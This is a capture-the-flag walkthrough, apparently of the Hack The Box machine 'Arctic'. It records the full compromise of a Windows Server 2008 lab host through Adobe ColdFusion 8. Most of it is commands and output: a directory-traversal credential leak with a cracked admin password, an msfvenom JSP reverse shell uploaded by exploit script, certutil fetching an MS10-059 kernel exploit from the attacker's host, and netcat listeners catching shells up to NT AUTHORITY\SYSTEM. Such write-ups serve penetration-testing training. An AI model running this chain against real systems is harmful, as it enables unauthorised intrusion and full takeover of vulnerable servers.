Walkthrough
Gaining a Foothold
Nmap
┌──(kali㉿kali)-[~]
└─$ nmap -T4 -A -p- -Pn 10.129.94.47
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-18 21:08 EST
Nmap scan report for 10.129.94.47
Host is up (0.31s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open http JRun Web Server
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 406.25 seconds
Google CFIDE > Cold Fusion
Research default credential
HTTP
Login from > Adobe Coldfusion
Adobe ColdFusion - Directory Traversal
https://www.exploit-db.com/exploits/14641
2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
admin
happyday
https://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
Generate JSP reverse shell payload
https://ruuand.github.io/Reverse_Shells/
┌──(kali㉿kali)-[~/WPE/Arctic]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.6 LPORT=7777 -f raw > shell.jsp
Payload size: 1496 bytes
Upload the payload to the target server
Research ColdFusion 8 exploit
https://github.com/nipunsomani/Adobe-ColdFusion-8-File-Upload-Exploit/blob/main/exploit.py
┌──(kali㉿kali)-[~/WPE/Arctic]
└─$ python cfidexploit.py 10.129.94.47 8500 /home/kali/WPE/Arctic/shell.jsp
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Sending payload...
Successfully uploaded payload!
Find it at http://10.129.94.47:8500/userfiles/file/exploit.jsp
Set up listener on port 7777
Open link
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 7777
listening on [any] 7777 ...
connect to [10.10.14.6] from (UNKNOWN) [10.129.94.47] 49610
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>whoami
whoami
arctic\tolis
C:\ColdFusion8\runtime\bin>systeminfo
systeminfo
Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45 ��
System Boot Time: 20/1/2024, 12:03:23 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2394 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/11/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 6.143 MB
Available Physical Memory: 4.970 MB
Virtual Memory: Max Size: 12.285 MB
Virtual Memory: Available: 11.093 MB
Virtual Memory: In Use: 1.192 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.94.47
Transfer and execute powerup
C:\ColdFusion8\runtime\bin>powershell -ep bypass .\PowerUp.ps1
powershell -ep bypass .\PowerUp.ps1
Privilege : SeImpersonatePrivilege
Attributes : SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
TokenHandle : 972
ProcessId : 3696
Name : 3696
Check : Process Token Privileges
ServiceName : ColdFusion 8 .NET Service
Path : C:\ColdFusion8\jnbridge\CF8DotNetsvc.exe
ModifiableFile : C:\ColdFusion8\jnbridge\CF8DotNetsvc.exe
ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Travers
e, DeleteChild...}
ModifiableFileIdentityReference : ARCTIC\tolis
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 .NE
T Service'
CanRestart : False
Name : ColdFusion 8 .NET Service
Check : Modifiable Service Files
ServiceName : ColdFusion 8 Application Server
Path : "C:\ColdFusion8\runtime\bin\jrunsvc.exe"
ModifiableFile : C:\ColdFusion8\runtime\bin\jrunsvc.exe
ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Travers
e, DeleteChild...}
ModifiableFileIdentityReference : ARCTIC\tolis
StartName : .\tolis
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 App
lication Server'
CanRestart : False
Name : ColdFusion 8 Application Server
Check : Modifiable Service Files
ServiceName : ColdFusion 8 ODBC Agent
Path : C:\ColdFusion8\db\slserver54\bin\swagent.exe
"ColdFusion 8 ODBC Agent"
ModifiableFile : C:\ColdFusion8\db\slserver54\bin
ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Travers
e, DeleteChild...}
ModifiableFileIdentityReference : ARCTIC\tolis
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 ODB
C Agent'
CanRestart : False
Name : ColdFusion 8 ODBC Agent
Check : Modifiable Service Files
ServiceName : ColdFusion 8 ODBC Agent
Path : C:\ColdFusion8\db\slserver54\bin\swagent.exe
"ColdFusion 8 ODBC Agent"
ModifiableFile : C:\ColdFusion8\db\slserver54\bin
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 ODB
C Agent'
CanRestart : False
Name : ColdFusion 8 ODBC Agent
Check : Modifiable Service Files
ServiceName : ColdFusion 8 ODBC Agent
Path : C:\ColdFusion8\db\slserver54\bin\swagent.exe
"ColdFusion 8 ODBC Agent"
ModifiableFile : C:\ColdFusion8\db\slserver54\bin
ModifiableFilePermissions : WriteData/AddFile
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 ODB
C Agent'
CanRestart : False
Name : ColdFusion 8 ODBC Agent
Check : Modifiable Service Files
ServiceName : ColdFusion 8 ODBC Agent
Path : C:\ColdFusion8\db\slserver54\bin\swagent.exe
"ColdFusion 8 ODBC Agent"
ModifiableFile : C:\ColdFusion8\db\slserver54\bin\swagent.exe
ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Travers
e, DeleteChild...}
ModifiableFileIdentityReference : ARCTIC\tolis
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 ODB
C Agent'
CanRestart : False
Name : ColdFusion 8 ODBC Agent
Check : Modifiable Service Files
ServiceName : ColdFusion 8 ODBC Server
Path : C:\ColdFusion8\db\slserver54\bin\swstrtr.exe
"ColdFusion 8 ODBC Server"
ModifiableFile : C:\ColdFusion8\db\slserver54\bin
ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Travers
e, DeleteChild...}
ModifiableFileIdentityReference : ARCTIC\tolis
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 ODB
C Server'
CanRestart : False
Name : ColdFusion 8 ODBC Server
Check : Modifiable Service Files
ServiceName : ColdFusion 8 ODBC Server
Path : C:\ColdFusion8\db\slserver54\bin\swstrtr.exe
"ColdFusion 8 ODBC Server"
ModifiableFile : C:\ColdFusion8\db\slserver54\bin
ModifiableFilePermissions : AppendData/AddSubdirectory
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 ODB
C Server'
CanRestart : False
Name : ColdFusion 8 ODBC Server
Check : Modifiable Service Files
ServiceName : ColdFusion 8 ODBC Server
Path : C:\ColdFusion8\db\slserver54\bin\swstrtr.exe
"ColdFusion 8 ODBC Server"
ModifiableFile : C:\ColdFusion8\db\slserver54\bin
ModifiableFilePermissions : WriteData/AddFile
ModifiableFileIdentityReference : BUILTIN\Users
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 ODB
C Server'
CanRestart : False
Name : ColdFusion 8 ODBC Server
Check : Modifiable Service Files
ServiceName : ColdFusion 8 ODBC Server
Path : C:\ColdFusion8\db\slserver54\bin\swstrtr.exe
"ColdFusion 8 ODBC Server"
ModifiableFile : C:\ColdFusion8\db\slserver54\bin\swstrtr.exe
ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Travers
e, DeleteChild...}
ModifiableFileIdentityReference : ARCTIC\tolis
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 ODB
C Server'
CanRestart : False
Name : ColdFusion 8 ODBC Server
Check : Modifiable Service Files
ServiceName : ColdFusion 8 Search Server
Path : "C:\ColdFusion8\verity\k2\_nti40\bin\k2admin.
exe" -cfg "C:\ColdFusion8\verity\k2\common\ve
rity.cfg" -ntstart 1
ModifiableFile : C:\ColdFusion8\verity\k2\_nti40\bin\k2admin.e
xe
ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Travers
e, DeleteChild...}
ModifiableFileIdentityReference : ARCTIC\tolis
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 Sea
rch Server'
CanRestart : False
Name : ColdFusion 8 Search Server
Check : Modifiable Service Files
ServiceName : ColdFusion 8 Search Server
Path : "C:\ColdFusion8\verity\k2\_nti40\bin\k2admin.
exe" -cfg "C:\ColdFusion8\verity\k2\common\ve
rity.cfg" -ntstart 1
ModifiableFile : C:\ColdFusion8\verity\k2\common\verity.cfg
ModifiableFilePermissions : {ReadAttributes, ReadControl, Execute/Travers
e, DeleteChild...}
ModifiableFileIdentityReference : ARCTIC\tolis
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'ColdFusion 8 Sea
rch Server'
CanRestart : False
Name : ColdFusion 8 Search Server
Check : Modifiable Service Files
ModifiablePath : C:\ColdFusion8\lib
IdentityReference : ARCTIC\tolis
Permissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild
...}
%PATH% : C:\ColdFusion8\runtime\..\lib
Name : C:\ColdFusion8\runtime\..\lib
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\lib\wlbsctrl.dll'
ModifiablePath : C:\ColdFusion8\lib
IdentityReference : BUILTIN\Users
Permissions : AppendData/AddSubdirectory
%PATH% : C:\ColdFusion8\runtime\..\lib
Name : C:\ColdFusion8\runtime\..\lib
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\lib\wlbsctrl.dll'
ModifiablePath : C:\ColdFusion8\lib
IdentityReference : BUILTIN\Users
Permissions : WriteData/AddFile
%PATH% : C:\ColdFusion8\runtime\..\lib
Name : C:\ColdFusion8\runtime\..\lib
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\lib\wlbsctrl.dll'
ModifiablePath : C:\ColdFusion8\jintegra\bin
IdentityReference : ARCTIC\tolis
Permissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild
...}
%PATH% : C:\ColdFusion8\runtime\..\jintegra\bin
Name : C:\ColdFusion8\runtime\..\jintegra\bin
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\jintegra\bin\wlbsc
trl.dll'
ModifiablePath : C:\ColdFusion8\jintegra\bin
IdentityReference : BUILTIN\Users
Permissions : AppendData/AddSubdirectory
%PATH% : C:\ColdFusion8\runtime\..\jintegra\bin
Name : C:\ColdFusion8\runtime\..\jintegra\bin
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\jintegra\bin\wlbsc
trl.dll'
ModifiablePath : C:\ColdFusion8\jintegra\bin
IdentityReference : BUILTIN\Users
Permissions : WriteData/AddFile
%PATH% : C:\ColdFusion8\runtime\..\jintegra\bin
Name : C:\ColdFusion8\runtime\..\jintegra\bin
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\jintegra\bin\wlbsc
trl.dll'
ModifiablePath : C:\ColdFusion8\jintegra\bin\international
IdentityReference : ARCTIC\tolis
Permissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild
...}
%PATH% : C:\ColdFusion8\runtime\..\jintegra\bin\international
Name : C:\ColdFusion8\runtime\..\jintegra\bin\international
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\jintegra\bin\inter
national\wlbsctrl.dll'
ModifiablePath : C:\ColdFusion8\jintegra\bin\international
IdentityReference : BUILTIN\Users
Permissions : AppendData/AddSubdirectory
%PATH% : C:\ColdFusion8\runtime\..\jintegra\bin\international
Name : C:\ColdFusion8\runtime\..\jintegra\bin\international
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\jintegra\bin\inter
national\wlbsctrl.dll'
ModifiablePath : C:\ColdFusion8\jintegra\bin\international
IdentityReference : BUILTIN\Users
Permissions : WriteData/AddFile
%PATH% : C:\ColdFusion8\runtime\..\jintegra\bin\international
Name : C:\ColdFusion8\runtime\..\jintegra\bin\international
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\jintegra\bin\inter
national\wlbsctrl.dll'
ModifiablePath : C:\ColdFusion8\verity\k2\_nti40\bin
IdentityReference : ARCTIC\tolis
Permissions : {ReadAttributes, ReadControl, Execute/Traverse, DeleteChild
...}
%PATH% : C:\ColdFusion8\verity\k2\_nti40\bin
Name : C:\ColdFusion8\verity\k2\_nti40\bin
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\verity\k2\_nti40\b
in\wlbsctrl.dll'
ModifiablePath : C:\ColdFusion8\verity\k2\_nti40\bin
IdentityReference : BUILTIN\Users
Permissions : AppendData/AddSubdirectory
%PATH% : C:\ColdFusion8\verity\k2\_nti40\bin
Name : C:\ColdFusion8\verity\k2\_nti40\bin
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\verity\k2\_nti40\b
in\wlbsctrl.dll'
ModifiablePath : C:\ColdFusion8\verity\k2\_nti40\bin
IdentityReference : BUILTIN\Users
Permissions : WriteData/AddFile
%PATH% : C:\ColdFusion8\verity\k2\_nti40\bin
Name : C:\ColdFusion8\verity\k2\_nti40\bin
Check : %PATH% .dll Hijacks
AbuseFunction : Write-HijackDll -DllPath 'C:\ColdFusion8\verity\k2\_nti40\b
in\wlbsctrl.dll'
C:\ColdFusion8\runtime\bin>net user tolis
net user tolis
User name tolis
Full Name tolis
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 22/3/2017 8:07:58 ��
Password expires Never
Password changeable 22/3/2017 8:07:58 ��
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 20/1/2024 12:03:35 ��
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
Escalating Privilege
Windows exploit suggester
┌──(kali㉿kali)-[/opt/Windows-Exploit-Suggester-python3]
└─$ sudo ./windows-exploit-suggester.py --database 2024-01-18-mssb.xlsx --systeminfo /home/kali/WPE/Arctic/systeminfo.txt
[*] initiating winsploit version 3.4...
[*] database file detected as xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (utf-8)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
C:\ColdFusion8\runtime\bin>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS10-059
Ran into issues
Fix: make directory called temp
transfer MS10-059.exe and execute it
Set up reverse shell
C:\temp>certutil -urlcache -f http://10.10.14.6:8000/MS10-059.exe MS10-059.exe
certutil -urlcache -f http://10.10.14.6:8000/MS10-059.exe MS10-059.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
C:\temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is 5C03-76A8
Directory of C:\temp
20/01/2024 03:00 �� <DIR> .
20/01/2024 03:00 �� <DIR> ..
20/01/2024 03:00 �� 784.384 MS10-059.exe
1 File(s) 784.384 bytes
2 Dir(s) 1.423.241.216 bytes free
C:\temp>MS10-059.exe
MS10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress por
C:\temp>MS10-059.exe 10.10.14.6 5555
MS10-059.exe 10.10.14.6 5555
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Changing registry values...<BR>/Chim values...<BR>
Reverse Shell
┌──(kali㉿kali)-[~]
└─$ nc -nvlp 5555
listening on [any] 5555 ...
connect to [10.10.14.6] from (UNKNOWN) [10.129.94.47] 49925
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\temp>whoami
whoami
nt authority\system
Fusion page > metasploit module > suggester
Win 2008 or 2007 > kernel exploit first